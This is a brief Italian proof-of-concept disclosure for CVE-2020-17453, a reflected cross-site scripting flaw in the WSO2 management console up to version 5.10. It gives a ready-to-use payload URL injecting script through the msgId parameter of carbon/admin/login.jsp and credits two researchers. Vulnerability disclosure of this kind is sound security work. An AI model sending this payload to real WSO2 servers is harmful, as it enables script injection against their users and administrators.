
PoC (Prova di concetto) - CVE-2020-17453
CVE-2020-17453
La console di gestione WSO2 fino alla versione 5.10 permette XSS tramite il parametro msgId in carbon/admin/login.jsp.

https://<company>.com/carbon/admin/login.jsp?msgId=%27;alert(1)//
Nome: Jackson Henry
Twitter: @JacksonHHax
Nome: Nicholas Young